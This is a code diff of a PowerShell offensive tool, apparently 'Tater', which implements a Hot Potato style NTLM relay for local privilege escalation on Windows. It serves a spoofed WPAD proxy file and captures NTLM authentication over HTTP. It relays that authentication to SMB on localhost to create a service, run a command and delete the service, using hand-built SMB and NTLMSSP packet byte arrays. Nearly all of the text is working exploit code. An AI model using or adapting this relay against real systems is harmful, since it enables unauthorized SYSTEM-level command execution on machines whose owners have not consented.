+                                              0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,
+                                              0x00,0x00,0x00,0x02,0x00 +
+                                              $SMB_context_handler
                 }
 
-                
-                8 {
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $tater.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x34)`
-                        + (0x00,0x00,0x00,0x34,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
-                        + (0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,0x00,0x00,0x00,0x13,0x00)`
-                        + $SMB_context_handler`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)
+                11
+                {
+                    $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
                 }
-                
-                9 {
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
-                }
-                
-                10 { 
-                    [Byte[]]$SMB_relay_execute_send = (0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                        + $tater.process_ID_bytes`
-                        + $SMB_user_ID`
-                        + (0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,0xff,0xff,0xff,0xff,0x08,0x00,0x2c)`
-                        + (0x00,0x00,0x00,0x2c,0x00,0x3f,0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,0x00)`
-                        + (0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x02,0x00)`
-                        + $SMB_context_handler
-                }
-                11 {
-                    [Byte[]]$SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
-                }
+
             }
-            
-            $SMB_relay_execute_stream.write($SMB_relay_execute_send, 0, $SMB_relay_execute_send.length)
+           
+            $SMB_relay_execute_stream.Write($SMB_relay_execute_send,0,$SMB_relay_execute_send.Length)
             $SMB_relay_execute_stream.Flush()
             
             if ($k -eq 5) 
             {
-                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)
+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
                 $SMB_context_handler = $SMB_relay_execute_bytes[88..107]
 
                 if(([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '00-00-00-00') -and ([System.BitConverter]::ToString($SMB_context_handler) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00'))
                 {
-                    #$tater.console_queue.add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
+                    #$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string is a local administrator on $SMBRelayTarget")
                 }
                 elseif([System.BitConverter]::ToString($SMB_relay_execute_bytes[108..111]) -eq '05-00-00-00')
                 {
-                    $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $SMBRelayTarget")
+                    $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string is not a local administrator on " + "$SMBRelayTarget")
                     $SMB_relay_failed = $true
                 }
                 else
@@ -721,23 +799,28 @@ $SMB_relay_execute_scriptblock =
                     $SMB_relay_failed = $true
                 }
 
+
             }
-            elseif (($k -eq 7) -or ($k -eq 9) -or ($k -eq 11))
+            elseif ($k -eq 7 -or $k -eq 9 -or $k -eq 11)
             {
-                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)
+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)
 
                 switch($k)
                 {
+
                     7 {
                         $SMB_context_handler = $SMB_relay_execute_bytes[92..111]
                         $SMB_relay_execute_error_message = "Service creation fault context mismatch"
                     }
+
                     11 {
                         $SMB_relay_execute_error_message = "Service start fault context mismatch"
                     }
+
                     13 {
                         $SMB_relay_execute_error_message = "Service deletion fault context mismatch"
                     }
+
                 }
                 
                 if([System.BitConverter]::ToString($SMB_context_handler[0..3]) -ne '00-00-00-00')
@@ -747,42 +830,46 @@ $SMB_relay_execute_scriptblock =
 
                 if([System.BitConverter]::ToString($SMB_relay_execute_bytes[88..91]) -eq '1a-00-00-1c')
                 {
-                    $tater.console_queue.add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
+                    $tater.console_queue.Add("$SMB_relay_execute_error_message service on $SMBRelayTarget")
                     $SMB_relay_failed = $true
                 }
+
             }        
             else
             {
-                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes, 0, $SMB_relay_execute_bytes.length)    
+                $SMB_relay_execute_stream.Read($SMB_relay_execute_bytes,0,$SMB_relay_execute_bytes.Length)    
             }
             
-            if((!$SMB_relay_failed) -and ($k -eq 7))
+            if(!$SMB_relay_failed -and $k -eq 7)
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")
+                $tater.console_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $SMBRelayTarget")
             }
-            elseif((!$SMB_relay_failed) -and ($k -eq 9))
+            elseif(!$SMB_relay_failed -and $k -eq 9)
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - Command likely executed on $SMBRelayTarget")
+                $tater.console_queue.Add("$(Get-Date -format 's') - Command likely executed on $SMBRelayTarget")
             }
-            elseif((!$SMB_relay_failed) -and ($k -eq 11))
+            elseif(!$SMB_relay_failed -and $k -eq 11)
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")
-                }   
+                $tater.console_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $SMBRelayTarget")
+            }   
             
-            [Byte[]]$SMB_relay_execute_ReadAndRequest = (0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,0x18,0x05,0x28)`
-                + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08)`
-                + $tater.process_ID_bytes`
-                + $SMB_user_ID`
-                + $SMB_multiplex_ID`
-                + (0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00)
+            $SMB_relay_execute_ReadAndRequest = 0x00,0x00,0x00,0x37,0xff,0x53,0x4d,0x42,0x2e,0x00,0x00,0x00,0x00,
+                                                0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0x00,0x08 +
+                                                $tater.process_ID_bytes +
+                                                $SMB_user_ID +
+                                                $SMB_multiplex_ID +
+                                                0x00,0x0a,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x58,
+                                                0x02,0x58,0x02,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00
             
             if($SMB_relay_failed)
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")
+                $tater.console_queue.Add("$(Get-Date -format 's') - SMB relay failed on $SMBRelayTarget")
                 BREAK SMB_relay_execute_loop
             }
 
             $k++
+
         }
         
         $tater.SMB_relay_active_step = 0
@@ -793,56 +880,62 @@ $SMB_relay_execute_scriptblock =
         {
             $tater.SMBRelay_success = $True
         }
+
     }
+
 }
 
 # HTTP Server ScriptBlock - HTTP listener
 $HTTP_scriptblock = 
-{ 
+{
     param ($Command,$HTTPPort,$WPADDirectHosts,$WPADPort)
 
-    Function NTLMChallengeBase64
+    function NTLMChallengeBase64
     {
-
         $HTTP_timestamp = Get-Date
         $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
-        $HTTP_timestamp = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_timestamp))
-        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
 
-        [byte[]]$HTTP_NTLM_bytes = (0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,0x00,0x00,0x00,0x05,0xc2,0x89,0xa2)`
-            + $HTTP_challenge_bytes`
-            + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00)`
-            + (0x02,0x00,0x06,0x00,0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00)`
-            + (0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,0x00,0x68,0x00,0x6f,0x00)`
-            + (0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00)`
-            + (0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00)`
-            + $HTTP_timestamp`
-            + (0x00,0x00,0x00,0x00,0x0a,0x0a)
+        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+                           0x00,0x00,0x00,0x05,0xc2,0x89,0xa2 +
+                           $HTTP_challenge_bytes +
+                           0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+                           0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+                           0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+                           0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+                           0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+                           0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+                           0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+                           0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+                           0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+                           $HTTP_timestamp +
+                           0x00,0x00,0x00,0x00,0x0a,0x0a
 
         $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
         $NTLM = 'NTLM ' + $NTLM_challenge_base64
         $NTLM_challenge = $HTTP_challenge
 
-        Return $NTLM
-
+        return $NTLM
     }
 
     $SMBRelayTarget = "127.0.0.1"
-
     $HTTP_port_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTPPort)
-    
     $WPADDirectHosts += "localhost"
+    $HTTP_content_length = $WPADPort.Length + 62
 
-    $HTTP_content_length = $WPADPort.length + 62
-
-    ForEach($WPAD_direct_host in $WPADDirectHosts)
+    foreach($WPAD_direct_host in $WPADDirectHosts)
     {
-        $HTTP_content_length += $WPAD_direct_host.length + 43
+        $HTTP_content_length += $WPAD_direct_host.Length + 43
         $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_content_length)
         $WPAD_direct_host_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPAD_direct_host)
-        $WPAD_direct_host_function_bytes = (0x69,0x66,0x20,0x28,0x64,0x6e,0x73,0x44,0x6f,0x6d,0x61,0x69,0x6e,0x49,0x73,0x28,0x68,0x6f,0x73,0x74,0x2c,0x20,0x22)`
-            + $WPAD_direct_host_bytes`
-            +(0x22,0x29,0x29,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x44,0x49,0x52,0x45,0x43,0x54,0x22,0x3b)
+
+        $WPAD_direct_host_function_bytes = 0x69,0x66,0x20,0x28,0x64,0x6e,0x73,0x44,0x6f,0x6d,0x61,0x69,0x6e,0x49,
+                                           0x73,0x28,0x68,0x6f,0x73,0x74,0x2c,0x20,0x22 +
+                                           $WPAD_direct_host_bytes +
+                                           0x22,0x29,0x29,0x20,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x44,0x49,
+                                           0x52,0x45,0x43,0x54,0x22,0x3b 
+        
         $WPAD_direct_hosts_bytes += $WPAD_direct_host_function_bytes
     }
 
@@ -850,6 +943,7 @@ $HTTP_scriptblock =
     
     :HTTP_listener_loop while ($tater.running)
     {
+
         if($tater.SMBRelay_success)
         {
             StopTater
@@ -857,33 +951,35 @@ $HTTP_scriptblock =
 
         $TCP_request = $NULL
         $TCP_request_bytes = New-Object System.Byte[] 1024
-
         $suppress_waiting_message = $false
 
         while(!$tater.HTTP_listener.Pending() -and !$tater.HTTP_client.Connected)
         {
+
             if(!$suppress_waiting_message)
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - Waiting for incoming HTTP connection")
+                $tater.console_queue.Add("$(Get-Date -format 's') - Waiting for incoming HTTP connection")
                 $suppress_waiting_message = $true
             }
+
             Start-Sleep -s 1
 
             if($tater.SMBRelay_success)
             {
                 StopTater
             }
+
         }
 
         if(!$tater.HTTP_client.Connected)
         {
-            $tater.HTTP_client = $tater.HTTP_listener.AcceptTcpClient() # will block here until connection 
+            $tater.HTTP_client = $tater.HTTP_listener.AcceptTcpClient()
 	        $HTTP_stream = $tater.HTTP_client.GetStream() 
         }
 
         while ($HTTP_stream.DataAvailable)
         {
-            $HTTP_stream.Read($TCP_request_bytes, 0, $TCP_request_bytes.Length)
+            $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
         }
 
         $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
@@ -891,20 +987,21 @@ $HTTP_scriptblock =
         if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*")
         {
             $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
-            $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
             $tater.request_RawUrl = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
         
             if($tater.request_RawUrl -eq "")
             {
                 $tater.request_RawUrl = "/"
             }
+
         }
 
         if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
         {
             $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
             $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
-            $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
             $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
         }
         else
@@ -913,62 +1010,69 @@ $HTTP_scriptblock =
         }
 
         $HTTP_type = "HTTP"
-
         $HTTP_request_type = ""
         
         if ($tater.request_RawUrl -match '/wpad.dat')
         {
-            $tater.response_StatusCode = (0x32,0x30,0x30)
-            $HTTP_response_phrase = (0x4f,0x4b)
-            $HTTP_WPAD_response = (0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x46,0x69,0x6e,0x64,0x50,0x72,0x6f,0x78,0x79,0x46,0x6f,0x72,0x55,0x52,0x4c,0x28)`
-                + (0x75,0x72,0x6c,0x2c,0x68,0x6f,0x73,0x74,0x29,0x7b)`
-                + $WPAD_direct_hosts_bytes`
-                + (0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x50,0x52,0x4f,0x58,0x59,0x20,0x31,0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a)`
-                + $WPAD_port_bytes`
-                + (0x22,0x3b,0x7d)
+            $tater.response_StatusCode = 0x32,0x30,0x30
+            $HTTP_response_phrase = 0x4f,0x4b
+
+            $HTTP_WPAD_response = 0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x46,0x69,0x6e,0x64,0x50,0x72,
+                                  0x6f,0x78,0x79,0x46,0x6f,0x72,0x55,0x52,0x4c,0x28,0x75,0x72,0x6c,0x2c,0x68,
+                                  0x6f,0x73,0x74,0x29,0x7b +
+                                  $WPAD_direct_hosts_bytes +
+                                  0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x22,0x50,0x52,0x4f,0x58,0x59,0x20,0x31,
+                                  0x32,0x37,0x2e,0x30,0x2e,0x30,0x2e,0x31,0x3a +
+                                  $WPAD_port_bytes +
+                                  0x22,0x3b,0x7d
 
             $NTLM = ''
             $HTTP_request_type = "WPAD"
         }
         elseif ($tater.request_RawUrl -eq '/GETHASHES')
         {
-            $tater.response_StatusCode = (0x34,0x30,0x31)
-            $HTTP_response_phrase = (0x4f,0x4b)
+            $tater.response_StatusCode = 0x34,0x30,0x31
+            $HTTP_response_phrase = 0x4f,0x4b
             $NTLM = 'NTLM'
             $HTTP_request_type = "NTLM"
         }
         else
         {
-            $tater.response_StatusCode = (0x33,0x30,0x32)
-            $HTTP_location = (0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x70,0x72,0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f)`
-                + (0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73)`
-                + (0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x45,0x78,0x70,0x69,0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,0x30,0x31,0x20,0x4a)`
-                + (0x61,0x6e,0x20,0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,0x0d,0x0a,0x4c,0x6f,0x63,0x61,0x74,0x69)`
-                + (0x6f,0x6e,0x3a,0x20,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x6c,0x6f,0x63,0x61,0x6c,0x68,0x6f,0x73,0x74,0x3a)`
-                + $HTTP_port_bytes`
-                + (0x2f,0x47,0x45,0x54,0x48,0x41,0x53,0x48,0x45,0x53,0x0d,0x0a)
+            $tater.response_StatusCode = 0x33,0x30,0x32
 
-            $HTTP_response_phrase = (0x4f,0x4b)
+            $HTTP_location = 0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x70,0x72,
+                             0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,
+                             0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,
+                             0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x45,0x78,0x70,0x69,
+                             0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,
+                             0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,
+                             0x0d,0x0a,0x4c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3a,0x20,0x68,0x74,0x74,0x70,0x3a,
+                             0x2f,0x2f,0x6c,0x6f,0x63,0x61,0x6c,0x68,0x6f,0x73,0x74,0x3a +
+                             $HTTP_port_bytes +
+                             0x2f,0x47,0x45,0x54,0x48,0x41,0x53,0x48,0x45,0x53,0x0d,0x0a
+
+            $HTTP_response_phrase = 0x4f,0x4b
             $NTLM = ''
             $HTTP_request_type = "Redirect"
 
             if($tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle)
             {
-                $tater.console_queue.add("$(Get-Date -format 's') - Attempting to redirect to http://localhost:$HTTPPort/gethashes and trigger relay")
+                $tater.console_queue.Add("$(Get-Date -format 's') - Attempting to redirect to http://localhost:" + "$HTTPPort/gethashes and trigger relay")
             }
+
         }
 
         if(($tater.request_RawUrl_old -ne $tater.request_RawUrl -and $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle) -or $tater.HTTP_client_handle_old -ne $tater.HTTP_client.Client.Handle)
         {
-            $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $tater.request_RawUrl + " received from " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
+            $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for " + $tater.request_RawUrl + " received from " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
         }
 
-        if($authentication_header.startswith('NTLM '))
+        if($authentication_header.StartsWith('NTLM '))
         {
             $authentication_header = $authentication_header -replace 'NTLM ',''
             [byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
-            $tater.response_StatusCode = (0x34,0x30,0x31)
-            $HTTP_response_phrase = (0x4f,0x4b)
+            $tater.response_StatusCode = 0x34,0x30,0x31
+            $HTTP_response_phrase = 0x4f,0x4b
             
             if ($HTTP_request_bytes[8] -eq 1)
             {
@@ -976,14 +1080,14 @@ $HTTP_scriptblock =
                 if($tater.SMB_relay_active_step -eq 0)
                 {
                     $tater.SMB_relay_active_step = 1
-                    $tater.console_queue.add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
-                    $tater.console_queue.add("$(Get-Date -format 's') - Grabbing challenge for relay from $SMBRelayTarget")
+                    $tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
+                    $tater.console_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + "$SMBRelayTarget")
                     $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
                     $SMB_relay_socket.connect($SMBRelayTarget,"445")
                     
                     if(!$SMB_relay_socket.connected)
                     {
-                        $tater.console_queue.add("$(Get-Date -format 's') - SMB relay target is not responding")
+                        $tater.console_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
                         $tater.SMB_relay_active_step = 0
                     }
                     
@@ -991,7 +1095,7 @@ $HTTP_scriptblock =
                     {
                         $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes
                         $tater.SMB_relay_active_step = 2
-                        $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.length]
+                        $SMB_relay_bytes = $SMB_relay_bytes[2..$SMB_relay_bytes.Length]
                         $SMB_user_ID = $SMB_relay_bytes[34..33]
                         $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
                         $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
@@ -1005,34 +1109,35 @@ $HTTP_scriptblock =
                         $SMB_reserved = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 32)..($SMB_relay_NTLMSSP_bytes_index + 39)]
                         $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
                     
-                        [byte[]] $HTTP_NTLM_bytes = (0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00)`
-                            + $SMB_domain_length_offset_bytes`
-                            + (0x05,0xc2,0x89,0xa2)`
-                            + $SMB_relay_NTLM_challenge`
-                            + $SMB_reserved`
-                            + $SMB_target_length_offset_bytes`
-                            + $SMB_relay_target_details
+                        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
+                                           $SMB_domain_length_offset_bytes +
+                                           0x05,0xc2,0x89,0xa2 +
+                                           $SMB_relay_NTLM_challenge +
+                                           $SMB_reserved +
+                                           $SMB_target_length_offset_bytes +
+                                           $SMB_relay_target_details
                     
                         $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
                         $NTLM = 'NTLM ' + $NTLM_challenge_base64
                         $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
                         $tater.HTTP_challenge_queue.Add($tater.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $tater.HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
-                        $tater.console_queue.add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $SMBRelayTarget")
-                        $tater.console_queue.add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
+                        $tater.console_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge " + "for relay from $SMBRelayTarget")
+                        $tater.console_queue.Add("$(Get-Date -format 's') - Providing challenge " + "$NTLM_challenge for relay to " + $tater.HTTP_client.Client.RemoteEndpoint.Address)
                         $tater.SMB_relay_active_step = 3
                     }
                     else
                     {
                         $NTLM = NTLMChallengeBase64
                     }
+
                 }
                 else
                 {
                      $NTLM = NTLMChallengeBase64
                 }
                 
-                $tater.response_StatusCode = (0x34,0x30,0x31)
-                $HTTP_response_phrase = (0x4f,0x4b)
+                $tater.response_StatusCode = 0x34,0x30,0x31
+                $HTTP_response_phrase = 0x4f,0x4b
                 
             }
             elseif ($HTTP_request_bytes[8] -eq 3)
@@ -1068,110 +1173,117 @@ $HTTP_scriptblock =
           
                 $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
                 $NTLM_response = $NTLM_response.Insert(32,':')
-                
-                $tater.response_StatusCode = (0x32,0x30,0x30)
-                $HTTP_response_phrase = (0x4f,0x4b)
+                $tater.response_StatusCode = 0x32,0x30,0x30
+                $HTTP_response_phrase = 0x4f,0x4b
                 $NTLM_challenge = ''
                 
                 if ($tater.SMB_relay_active_step -eq 3)
                 {
-                    $tater.console_queue.add("$(Get-Date -format 's') - Sending response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")
+                    $tater.console_queue.Add("$(Get-Date -format 's') - Sending response for " + "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to " + "$SMBRelaytarget")
                     $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
-                    $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.length]
+                    $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.Length]
                     
-                    if((!$SMB_relay_failed) -and ([System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00')))
+                    if(!$SMB_relay_failed -and [System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq ('00-00-00-00'))
